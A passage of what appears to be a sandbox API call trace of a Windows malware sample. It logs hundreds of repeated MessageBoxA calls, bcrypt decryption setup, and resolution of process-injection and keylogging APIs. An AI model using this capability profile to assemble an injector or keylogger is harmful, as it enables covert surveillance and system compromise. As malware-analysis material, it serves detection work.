uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.527] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.528] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.529] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.530] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.531] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.532] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.533] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.534] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0160.535] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0163.698] GetNativeSystemInfo (in: lpSystemInfo=0x19fe64 | out: lpSystemInfo=0x19fe64*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0163.699] VirtualAlloc (lpAddress=0x0, dwSize=0x154000, flAllocationType=0x3000, flProtect=0x4) returned 0x2b60000 [0163.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x74200000 [0163.780] GetProcAddress (hModule=0x74200000, lpProcName="BCryptSetProperty") returned 0x742047e0 [0163.780] GetProcAddress (hModule=0x74200000, lpProcName="BCryptGenerateSymmetricKey") returned 0x74204910 [0163.780] GetProcAddress (hModule=0x74200000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x74203760 [0163.780] GetProcAddress (hModule=0x74200000, lpProcName="BCryptDecrypt") returned 0x74204ff0 [0163.780] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74580000 [0163.780] GetProcAddress (hModule=0x74580000, lpProcName="HeapFree") returned 0x74591ba0 [0163.780] GetProcAddress (hModule=0x74580000, lpProcName="VirtualAlloc") returned 0x74597810 [0163.780] GetProcAddress (hModule=0x74580000, lpProcName="HeapReAlloc") returned 0x7785efe0 [0163.780] GetProcAddress (hModule=0x74580000, lpProcName="VirtualQuery") returned 0x74597a90 [0163.781] GetProcAddress (hModule=0x74580000, lpProcName="TerminateThread") returned 0x745a0160 [0163.781] GetProcAddress (hModule=0x74580000, lpProcName="CreateThread") returned 0x74599b90 [0163.781] GetProcAddress (hModule=0x74580000, lpProcName="WriteProcessMemory") returned 0x745c2850 [0163.781] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcess") returned 0x745938c0 [0163.781] GetProcAddress (hModule=0x74580000, lpProcName="OpenProcess") returned 0x74598bf0 [0163.781] GetProcAddress (hModule=0x74580000, lpProcName="GetWindowsDirectoryA") returned 0x7459b060 [0163.781] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtectEx") returned 0x745c2790 [0163.781] GetProcAddress (hModule=0x74580000, lpProcName="VirtualAllocEx") returned 0x745c2730 [0163.781] GetProcAddress (hModule=0x74580000, lpProcName="CreateRemoteThread") returned 0x745c07f0 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="CreateProcessA") returned 0x745c0750 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleW") returned 0x74599bc0 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="IsWow64Process") returned 0x74599f10 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="WriteFile") returned 0x745a6ca0 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="CreateFileW") returned 0x745a6890 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryW") returned 0x7459a840 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="GetLocalTime") returned 0x74599be0 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentThreadId") returned 0x74591b90 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcessId") returned 0x745923e0 [0163.782] GetProcAddress (hModule=0x74580000, lpProcName="ReadFile") returned 0x745a6bb0 [0163.783] GetProcAddress (hModule=0x74580000, lpProcName="FindFirstFileA") returned 0x745a6920 [0163.783] GetProcAddress (hModule=0x74580000, lpProcName="GetBinaryTypeW") returned 0x745c7820 [0163.783] GetProcAddress (hModule=0x74580000, lpProcName="FindNextFileA") returned 0x745a6980 [0163.783] GetProcAddress (hModule=0x74580000, lpProcName="GetFullPathNameA") returned 0x745a6ad0 [0163.783] GetProcAddress (hModule=0x74580000, lpProcName="GetTempPathW") returned 0x745a6b30 [0163.783] GetProcAddress (hModule=0x74580000, lpProcName="GetPrivateProfileStringW") returned 0x745a09a0 [0163.783] GetProcAddress (hModule=0x74580000, lpProcName="CreateFileA") returned 0x745a6880 [0163.783] GetProcAddress (hModule=0x74580000, lpProcName="GlobalAlloc") returned 0x74599950 [0163.783] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentDirectoryW") returned 0x7459a9a0 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="SetCurrentDirectoryW") returned 0x7459fb20 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="GetFileSize") returned 0x745a6a70 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="FreeLibrary") returned 0x74599f50 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="SetDllDirectoryW") returned 0x745a5070 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="GetFileSizeEx") returned 0x745a6a80 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryA") returned 0x745a4bf0 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="LocalFree") returned 0x745979a0 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="WaitForSingleObject") returned 0x745a6820 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="WaitForMultipleObjects") returned 0x745a6800 [0163.784] GetProcAddress (hModule=0x74580000, lpProcName="CreatePipe") returned 0x74590540 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="PeekNamedPipe") returned 0x745c19b0 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="DuplicateHandle") returned 0x745a6640 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="SetEvent") returned 0x745a67d0 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="GetStartupInfoA") returned 0x74599c10 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="CreateEventA") returned 0x745a6680 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleFileNameW") returned 0x74599b00 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="LoadResource") returned 0x745976f0 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="FindResourceW") returned 0x745a2a40 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="GetComputerNameW") returned 0x745a46a0 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="GlobalMemoryStatusEx") returned 0x7459afe0 [0163.785] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryExW") returned 0x74597930 [0163.786] GetProcAddress (hModule=0x74580000, lpProcName="FindFirstFileW") returned 0x745a6960 [0163.786] GetProcAddress (hModule=0x74580000, lpProcName="FindNextFileW") returned 0x745a69a0 [0163.786] GetProcAddress (hModule=0x74580000, lpProcName="SetFilePointer") returned 0x745a6c40 [0163.786] GetProcAddress (hModule=0x74580000, lpProcName="GetLogicalDriveStringsW") returned 0x745a6af0 [0163.786] GetProcAddress (hModule=0x74580000, lpProcName="DeleteFileW") returned 0x745a68c0 [0163.786] GetProcAddress (hModule=0x74580000, lpProcName="CopyFileW") returned 0x745a6ec0 [0163.786] GetProcAddress (hModule=0x74580000, lpProcName="GetDriveTypeW") returned 0x745a6a10 [0163.786] GetProcAddress (hModule=0x74580000, lpProcName="EnterCriticalSection") returned 0x7786f290 [0163.786] GetProcAddress (hModule=0x74580000, lpProcName="LeaveCriticalSection") returned 0x7786f210 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="InitializeCriticalSection") returned 0x7788a200 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="DeleteCriticalSection") returned 0x77880e60 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="GetProcessHeap") returned 0x74597710 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="ReleaseMutex") returned 0x745a67a0 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="TerminateProcess") returned 0x745a5100 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="CreateToolhelp32Snapshot") returned 0x745a7b50 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="Process32NextW") returned 0x7459d290 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="Process32FirstW") returned 0x7459f5a0 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="SizeofResource") returned 0x74598f80 [0163.787] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtect") returned 0x74597a50 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="GetSystemDirectoryW") returned 0x74599fd0 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="LockResource") returned 0x74597890 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="GetWindowsDirectoryW") returned 0x745a5120 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="Process32First") returned 0x7459f4d0 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="Process32Next") returned 0x7459d1c0 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="WinExec") returned 0x745bff70 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="GetTempPathA") returned 0x745a6b20 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="HeapAlloc") returned 0x77862bd0 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="lstrcmpW") returned 0x74597970 [0163.788] GetProcAddress (hModule=0x74580000, lpProcName="GetTickCount") returned 0x745a5eb0 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="lstrcpyW") returned 0x745bd260 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="WideCharToMultiByte") returned 0x74593880 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="lstrcpyA") returned 0x7459ea30 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="Sleep") returned 0x74597990 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="MultiByteToWideChar") returned 0x74592ad0 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="GetCommandLineA") returned 0x7459ab60 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleA") returned 0x745999f0 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="ExitProcess") returned 0x745a7b30 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="CreateProcessW") returned 0x7459b000 [0163.789] GetProcAddress (hModule=0x74580000, lpProcName="lstrcatA") returned 0x7459f640 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="lstrcmpA") returned 0x7459cc30 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="lstrlenA") returned 0x74598c80 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="ExpandEnvironmentStringsW") returned 0x7459cd50 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="lstrlenW") returned 0x74593690 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="CloseHandle") returned 0x745a6630 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="lstrcatW") returned 0x745bd170 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="GetLastError") returned 0x74593870 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="VirtualFree") returned 0x74597600 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="GetProcAddress") returned 0x745978b0 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="SetLastError") returned 0x74592af0 [0163.790] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleFileNameA") returned 0x7459a720 [0163.791] GetProcAddress (hModule=0x74580000, lpProcName="CreateDirectoryW") returned 0x745a6860 [0163.791] GetProcAddress (hModule=0x74580000, lpProcName="LocalAlloc") returned 0x74597a30 [0163.791] GetProcAddress (hModule=0x74580000, lpProcName="CreateMutexA") returned 0x745a66c0 [0163.791] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75640000 [0163.791] GetProcAddress (hModule=0x75640000, lpProcName="GetKeyState") returned 0x7565ddd0 [0163.791] GetProcAddress (hModule=0x75640000, lpProcName="GetMessageA") returned 0x7566e130 [0163.791] GetProcAddress (hModule=0x75640000, lpProcName="DispatchMessageA") returned 0x75676f10 [0163.792] GetProcAddress (hModule=0x75640000, lpProcName="CreateWindowExW") returned 0x75659860 [0163.792] GetProcAddress (hModule=0x75640000, lpProcName="CallNextHookEx") returned 0x75653550 [0163.792] GetProcAddress (hModule=0x75640000, lpProcName="GetAsyncKeyState") returned 0x7565e820 [0163.792] GetProcAddress (hModule=0x75640000, lpProcName="RegisterClassW") returned 0x75659800 [0163.792] GetProcAddress (hModule=0x75640000, lpProcName="GetRawInputData") returned 0x7567c3f0 [0163.792] GetProcAddress (hModule=0x75640000, lpProcName="MapVirtualKeyA") returned 0x75673e20 [0163.792] GetProcAddress (hModule=0x75640000, lpProcName="DefWindowProcA") returned 0x778baed0 [0163.792] GetProcAddress (hModule=0x75640000, lpProcName="RegisterRawInputDevices") returned 0x7567c950 [0163.792] GetProcAddress (hModule=0x75640000, lpProcName="TranslateMessage") returned 0x7565d9b0 [0163.793] GetProcAddress (hModule=0x75640000, lpProcName="GetForegroundWindow") returned 0x75678cb0 [0163.793] GetProcAddress (hModule=0x75640000, lpProcName="GetKeyNameTextW") returned 0x756a8f40 [0163.793] GetProcAddress (hModule=0x75640000, lpProcName="PostQuitMessage") returned 0x756772f0 [0163.793] GetProcAddress (hModule=0x75640000, lpProcName="MessageBoxA") returned 0x756bfec0 [0163.793] GetProcAddress (hModule=0x75640000, lpProcName="GetLastInputInfo") returned 0x7566e100 [0163.793] GetProcAddress (hModule=0x75640000, lpProcName="wsprintfW") returned 0x7566f890 [0163.793] GetProcAddress (hModule=0x75640000, lpProcName="GetWindowTextW") returned 0x7566cb20 [0163.793] GetProcAddress (hModule=0x75640000, lpProcName="wsprintfA") returned 0x756704a0 [0163.794] GetProcAddress (hModule=0x75640000, lpProcName="ToUnicode") returned 0x756747d0 [0163.794] LoadLibraryA 